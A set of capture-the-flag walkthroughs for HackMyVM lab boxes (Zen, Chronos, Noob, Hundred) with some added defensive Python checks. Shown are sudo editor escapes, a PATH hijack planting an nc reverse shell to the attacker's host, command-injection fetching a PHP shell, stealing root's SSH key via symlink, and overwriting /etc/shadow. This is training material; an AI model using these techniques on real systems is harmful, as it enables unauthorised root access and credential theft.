As kodo, sudo -l allows /usr/bin/see as hua. see is run-mailcap: with --action=edit it opens the file in an editor, and a shell escape from that editor (the keystroke used here was !:/bin/bash; in vi the form is :!/bin/bash) lands us as user hua.

```bash
kodo@zen:/home/zenmaster$ sudo -l
Matching Defaults entries for kodo on zen:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kodo may run the following commands on zen:
    (hua) NOPASSWD: /usr/bin/see
kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
hua@zen:/home/zenmaster$ id
uid=1002(hua) gid=1002(hua) groups=1002(hua)
```
As hua, check sudo -l again.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
```


We can write to /usr/local/bin, which comes second in sudo's secure_path, ahead of /usr/bin and /bin.

```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null
...
/tmp/.X11-unix
/usr/local/bin
/usr/lib/systemd/system/mountnfs-bootclean.service
...
```
strace on add-shell shows it looks up awk, cat and rm through PATH, probing /usr/local/bin first, where none of them exist. Because sudo runs it with secure_path starting at /usr/local/sbin and /usr/local/bin, a binary we plant there is found before the real one.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory
```

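
Added example, my code rather than anything from the page, covering both this PATH hijack and Bunny's writable random.py: a search-path shadowing check. Given an ordered list of directories and a name, it reports where the name really resolves, any writable directory searched before that (a file planted there wins, as /usr/local/bin does for awk here), and whether the real file itself is writable (as random.py was on Bunny). The file-system view is constructed from the two boxes so it runs offline; on a real host the default `os.path.exists` / `os.access` predicates are used instead.

```python
import os
from typing import Callable, Dict, List

# sudo's secure_path on zen, as printed by sudo -l above.
SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed file-system view: what exists and what the low-priv user can
# write.  zen: /usr/local/bin writable, real awk/cat/rm live in /usr/bin.
# bunny: /usr/lib/python3.7/random.py itself writable, /opt not writable.
FAKE_EXISTS = {"/usr/bin/awk", "/usr/bin/cat", "/usr/bin/rm", "/bin/cat", "/bin/rm",
               "/usr/lib/python3.7/random.py", "/usr/lib/python3.7/os.py"}
FAKE_WRITABLE = {"/usr/local/bin", "/usr/lib/python3.7/random.py", "/tmp"}


def _can_write(path: str) -> bool:
    return os.access(path, os.W_OK)


def shadow_candidates(search_dirs: List[str], name: str,
                      exists: Callable[[str], bool] = os.path.exists,
                      writable: Callable[[str], bool] = _can_write) -> Dict[str, List[str]]:
    """Where could `name` be hijacked when looked up along `search_dirs`?

    "resolves_to": the first existing copy, i.e. what actually runs/imports.
    "plantable":   writable directories searched BEFORE the real file.
    "overwritable": the real file itself if it is writable.
    Directories after the real file are irrelevant to lookup order.
    """
    result: Dict[str, List[str]] = {"resolves_to": [], "plantable": [], "overwritable": []}
    for d in search_dirs:
        candidate = os.path.join(d, name)
        if exists(candidate):
            result["resolves_to"].append(candidate)
            if writable(candidate):
                result["overwritable"].append(candidate)
            break
        if writable(d):
            result["plantable"].append(d)
    return result


def check_path(path_var: str, commands: List[str],
               exists: Callable[[str], bool] = os.path.exists,
               writable: Callable[[str], bool] = _can_write) -> Dict[str, Dict[str, List[str]]]:
    """Run shadow_candidates for each command a privileged script calls."""
    dirs = [d for d in path_var.split(":") if d]
    return {c: shadow_candidates(dirs, c, exists, writable) for c in commands}


if __name__ == "__main__":
    # zen: the commands strace showed add-shell looking up, via secure_path.
    for cmd, r in check_path(SECURE_PATH, ["awk", "cat", "rm"],
                             FAKE_EXISTS.__contains__, FAKE_WRITABLE.__contains__).items():
        print(cmd, r)
    # bunny: a module imported by root's /opt/pendu.py, looked up along sys.path
    # (script directory first, then the stdlib).
    print("random.py", shadow_candidates(["/opt", "/usr/lib/python3.7"], "random.py",
                                         FAKE_EXISTS.__contains__, FAKE_WRITABLE.__contains__))
```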

Plant a fake awk there and run add-shell through sudo to get a root shell.

```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
hua@zen:/tmp$ chmod +x /usr/local/bin/awk
hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38124.
id;hostname
uid=0(root) gid=0(root) groups=0(root)
zen
```

HackMyVm Chronos Walkthrough


The author's writeup is here: https://al1enum.github.io/docs/Chronos.pdf.

Very interesting machine.

The author uses perl for the reverse shell because the injection point filters many keywords (nc, bash, python, etc.).

My way is to use wget to fetch a PHP reverse shell into the web root and then request it.

~ curl 'http://chronos.local:8000/date?format=261Bh6biKcNSb82qsJG3axmPWvBhPVZUTUzqYLXr2nGfYVHfcpNVUhTU1Z95B5dJzYt151Eki' -A 'Chronos'  
 Something went wrong

 ~ curl 'http://chronos.local:8000/date?format=H8SMnBduptVPuh8JQtH81okZXHxz74' -A 'Chronos'
 Sun Aug  8 04:05:06 UTC 2021
 total 24
 drwxr-xr-x 3 www-data www-data 4096 Aug  8 04:03 .
 drwxr-xr-x 3 root     root     4096 Jul 29 08:59 ..
 drwxr-xr-x 2 www-data www-data 4096 Jul 30 08:00 css
 -rw-r--r-- 1 www-data www-data 1887 Aug  4 07:18 index.html
 -rw-r--r-- 1 www-data www-data 5496 Aug  8 04:03 r.php

HackMyVm Noob Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Noob

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for secret.vinci.hmv (192.168.56.100)
 Host is up (0.0010s latency).
 Not shown: 65533 closed ports
 PORT      STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
 |   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
 |_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
 65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
 |_http-title: Site doesn't have a title (text/plain; charset=utf-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Check 65530 http.

 ~ curl http://192.168.56.100:65530
 404 page not found

Try /index.

 ~ curl http://192.168.56.100:65530/index
 Hi, You are close!

Scan directories. Every name with an extension gets a fake response, so omit extensions.

```bash
~ gobuster dir -u http://192.168.56.100:65530 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard -o 65530.log
...

/index (Status: 200) [Size: 19]
/http%3A%2F%2Fwww (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3A%2F%2Fblogs (Status: 301) [Size: 47] [--> /http:/blogs]
/http%3A%2F%2Fblog (Status: 301) [Size: 46] [--> /http:/blog]
/**http%3A%2F%2Fwww (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]
/http%3A%2F%2Fradar (Status: 301) [Size: 47] [--> /http:/radar]
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fweblog (Status: 301) [Size: 48] [--> /http:/weblog]
/http%3A%2F%2Fswik (Status: 301) [Size: 46] [--> /http:/swik]
/nt4share (Status: 301) [Size: 45] [--> /nt4share/]
```

The last entry, /nt4share, stands out. Check it.

```bash
~ curl http://192.168.56.100:65530/nt4share/
<pre>
<a href=".Xauthority">.Xauthority</a>
<a href=".bash_history">.bash_history</a>
<a href=".bash_logout">.bash_logout</a>
<a href=".bashrc">.bashrc</a>
<a href=".profile">.profile</a>
<a href=".ssh/">.ssh/</a>
<a href="linpeas.sh">linpeas.sh</a>
<a href="pspy64">pspy64</a>
</pre>
```

It is a user's home directory served over HTTP. .bash_history gives the user name, adela.

```bash
~ curl http://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null
...
```

Download id_rsa from .ssh/ and log in over SSH as adela.

```bash
~ chmod 600 id_rsa
~ ssh adela@192.168.56.100 -i id_rsa
...
adela@noob:~$ id
uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

The last step is tricky: after a lot of enumeration there is still no obvious path to root.

The Go file server on 65530 serves adela's home directory and follows symlinks, and it evidently runs with enough privilege to read root's files. Create a symlink to /root/.ssh/id_rsa inside the home directory and fetch it over HTTP.

adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
 ...
 ~ curl http://192.168.56.100:65530/nt4share/id_rsa                    
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 ...
 ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
 T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
 -----END OPENSSH PRIVATE KEY-----
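
Added example, my code rather than the box's server (Go's http.FileServer follows symlinks, which is the behaviour being abused): the check a static file server needs so that a symlink planted in the served directory cannot pull in files from outside it. `demo()` rebuilds the noob layout in a temporary directory, with a served share, a "root-only" key outside it and the `ln -s` from above, and compares the naive lookup with the resolved one. Directory and file names in the demo are constructed.

```python
import os
import tempfile
from typing import Dict, Optional


def resolve_under_root(root: str, request_path: str) -> Optional[str]:
    """Map an HTTP path to a file under `root`, refusing anything that
    escapes it once symlinks and '..' are resolved.  None means reject."""
    real_root = os.path.realpath(root)
    # Drop the leading slash so join() does not treat the request as absolute.
    candidate = os.path.join(real_root, request_path.lstrip("/"))
    real_target = os.path.realpath(candidate)
    if real_target != real_root and not real_target.startswith(real_root + os.sep):
        return None
    return real_target


def naive_resolve(root: str, request_path: str) -> str:
    """What a symlink-following server effectively opens."""
    return os.path.join(root, request_path.lstrip("/"))


def demo() -> Dict[str, Dict[str, object]]:
    """Constructed layout: <tmp>/nt4share is served, <tmp>/root_ssh/id_rsa
    is the secret outside it, and nt4share/id_rsa is the planted symlink."""
    base = tempfile.mkdtemp()
    served = os.path.join(base, "nt4share")
    secret_dir = os.path.join(base, "root_ssh")
    os.makedirs(served)
    os.makedirs(secret_dir)
    secret = os.path.join(secret_dir, "id_rsa")
    with open(secret, "w") as f:
        f.write("-----BEGIN OPENSSH PRIVATE KEY-----\nFAKE\n-----END OPENSSH PRIVATE KEY-----\n")
    with open(os.path.join(served, ".bashrc"), "w") as f:
        f.write("# ordinary file inside the share\n")
    os.symlink(secret, os.path.join(served, "id_rsa"))   # the ln -s step above

    results: Dict[str, Dict[str, object]] = {}
    for req in ["/.bashrc", "/id_rsa", "/../root_ssh/id_rsa"]:
        naive = naive_resolve(served, req)
        results[req] = {
            "naive_exists": os.path.isfile(naive),      # isfile follows symlinks
            "safe": resolve_under_root(served, req),
        }
    return results


if __name__ == "__main__":
    for req, r in demo().items():
        print(f"{req:22} naive_exists={r['naive_exists']!s:5} safe={r['safe']}")
```

The symlinked id_rsa exists from the naive server's point of view but is rejected once the target is canonicalised; the plain .bashrc passes. The same realpath-then-prefix check is what a file server should do before opening anything the client named.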

HackMyVm Hundred Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Hundred

Scan open ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rwxrwxrwx    1 0        0             435 Aug 02 06:19 id_rsa [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000         1679 Aug 02 06:11 id_rsa.pem [NSE: writeable]
 | -rwxrwxrwx    1 1000     1000          451 Aug 02 06:11 id_rsa.pub [NSE: writeable]
 |_-rwxrwxrwx    1 0        0             187 Aug 02 06:27 users.txt [NSE: writeable]
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |      Connected to ::ffff:192.168.56.150
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 1
 |      vsFTPd 3.0.3 - secure, fast, stable
 |_End of status
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 ef:28:1f:2a:1a:56:49:9d:77:88:4f:c4:74:56:0f:5c (RSA)
 |   256 1d:8d:a0:2e:e9:a3:2d:a1:4d:ec:07:41:75:ce:47:0e (ECDSA)
 |_  256 06:80:3b:fc:c5:f7:7d:c5:58:26:83:c4:f7:7e:a3:d9 (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Log in to FTP anonymously, download all four files and check each one.

id_rsa is a fake key, users.txt is a list of names, and id_rsa.pem looks like a real RSA private key.

Port 80 only has index.html. Its source contains a bogus CSS property naming a file, h4ckb1tu5.enc, and a comment hinting at a hidden directory.

```bash
~ curl http://192.168.56.100/index.html
<style>
.center {
display: block;
margin-left: auto;
margin-right: auto;
key: h4ckb1tu5.enc;
width: 50%;
}
</style>

<img src="logo.jpg" class="center">
<h1>Thank you ALL!</h1>
<h1>100 f*cking VMs!!</h1>

<!-- l4nr3n, nice dir.-->
```


Download h4ckb1tu5.enc. It is RSA-encrypted with the public half of the key from FTP, so decrypt it with id_rsa.pem to get the directory name (openssl rsautl is deprecated in OpenSSL 3; openssl pkeyutl -decrypt takes the same -inkey/-in/-out options).

```bash
~ openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out key.bin
~ cat key.bin
/softyhackb4el7dshelldredd
```
Scan that directory with common.txt; it serves another id_rsa.

 ~ gobuster dir -u http://192.168.56.100/softyhackb4el7dshelldredd -t 50  -w /usr/share/dirb/wordlists/common.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 ===============================================================
 /id_rsa               (Status: 200) [Size: 1876]
 /index.html           (Status: 200) [Size: 26]  
 /index.html           (Status: 200) [Size: 26]

Trying the names from users.txt against SSH with this key gets only password prompts; the real user name is hmv, for which the server accepts the key (ssh only asks for the passphrase once the public key is accepted), so we still need the key's passphrase.

 ~ ssh noname@192.168.56.100 -i id_rsa    
 noname@192.168.56.100's password:

 ~ ssh hmv@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':

The web root also serves logo.jpg; check it for a hidden payload, using users.txt as the wordlist.

 ~ stegseek --crack logo.jpg users.txt
 StegSeek version 0.5
 Progress: 0.00% (0 bytes)          

 [i] --> Found passphrase: "cromiphi"
 [i] Original filename: "toyou.txt"
 [i] Extracting to "logo.jpg.out"

 ~ cat logo.jpg.out                                                                                      
 d4t4s3c#1

Now we can log in over SSH as hmv with the passphrase d4t4s3c#1.

 ~ ssh hmv@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
 hmv@hundred:~$ id
 uid=1000(hmv) gid=1000(hmv) groups=1000(hmv),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

/etc/shadow is writable by hmv.

hmv@hundred:/$ find / -writable -not -path "/proc*" 2>/dev/null
 ...
 /var/www/html/softyhackb4el7dshelldredd/id_rsa
 /etc/shadow
 ...

Generate a hash for "mypass", write a root entry to /etc/shadow and su to root. The 13-character output of openssl passwd is a legacy DES-crypt hash, which Debian still accepts (openssl passwd -6 gives SHA-512 crypt). Note that echo > /etc/shadow replaces the whole file, wiping every other account's entry including hmv's; replacing only the root line keeps the box usable.

 hmv@hundred:/$ openssl passwd mypass
 J9ZxI.ncuCgxs
 hmv@hundred:/$ echo 'root:J9ZxI.ncuCgxs:18656:0:99999:7:::' > /etc/shadow
 hmv@hundred:/$ su root
 Password:
 root@hundred:/# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 hundred
 root@hundred:/#
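
Added example, my code rather than the page's: the less destructive version of the last step, which swaps in a new hash for one user and leaves every other shadow entry intact, and refuses input that is not shaped like a crypt hash (so a plaintext password cannot end up in the hash field by mistake). The shadow content below is constructed, not copied from the box; the hash is the one openssl produced above.

```python
from typing import List

# Constructed /etc/shadow standing in for the real file.  Fields are
# name:hash:lastchg:min:max:warn:inactive:expire:reserved (9 fields).
SAMPLE_SHADOW = """root:*:18656:0:99999:7:::
daemon:*:18656:0:99999:7:::
hmv:$6$saltsalt$hmvhashhmvhashhmvhashhmvhashhmvhashhmvhashhmvhashhmvhashhmvhashhmvhash:18656:0:99999:7:::
"""

# Output of `openssl passwd mypass` above: 13 characters = legacy DES crypt.
DES_HASH = "J9ZxI.ncuCgxs"


def is_plausible_hash(h: str) -> bool:
    """Accept DES-crypt (13 chars) or a modular-crypt hash ($id$salt$hash)."""
    if h.startswith("$"):
        return len(h.split("$")) >= 4
    return len(h) == 13


def set_password_hash(shadow_text: str, user: str, new_hash: str,
                      lastchg: int = 18656) -> str:
    """Return shadow_text with only `user`'s hash replaced (appended if absent).

    Unlike `echo '...' > /etc/shadow`, every other account keeps its entry.
    """
    if not is_plausible_hash(new_hash):
        raise ValueError("refusing to write something that is not a crypt hash")
    out: List[str] = []
    found = False
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) == 9 and fields[0] == user:
            fields[1] = new_hash
            fields[2] = str(lastchg)   # days since epoch of this change
            line = ":".join(fields)
            found = True
        out.append(line)
    if not found:
        out.append(f"{user}:{new_hash}:{lastchg}:0:99999:7:::")
    return "\n".join(out) + "\n"


def hash_for(shadow_text: str, user: str) -> str:
    """Read back the hash field for `user`."""
    for line in shadow_text.splitlines():
        f = line.split(":")
        if f[0] == user:
            return f[1]
    raise KeyError(user)


if __name__ == "__main__":
    updated = set_password_hash(SAMPLE_SHADOW, "root", DES_HASH)
    print(updated, end="")
    # On the box: write `updated` back to /etc/shadow, then `su root` with "mypass".
```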